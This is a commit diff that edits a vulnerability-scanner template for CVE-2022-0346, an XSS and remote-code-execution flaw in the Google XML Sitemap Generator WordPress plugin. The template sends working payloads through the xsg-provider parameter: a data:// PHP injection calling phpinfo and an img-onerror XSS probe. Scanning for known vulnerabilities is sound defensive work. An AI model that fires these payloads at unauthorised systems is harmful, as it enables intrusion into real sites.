Update CVE-2022-0346.yaml
parent
4447a831de
commit
d49deffd3e
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
|
||||
name: Google XML Sitemap Generator < 2.0.4 - Cross-Site Scripting & RCE
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,8 +16,8 @@ info:
|
|||
cve-id: CVE-2022-0346
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: xss,wp,wordpress,wp-plugin,cve,cve2022,wpscan
|
||||
verified: true
|
||||
tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -25,13 +25,14 @@ requests:
|
|||
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
|
||||
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
|
||||
- "status_code==200 && contains(body_2, '<img src onerror=alert(document.domain)>') && contains(body_2, 'Invalid Provider type specified')"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
|
|
Loading…
Reference in New Issue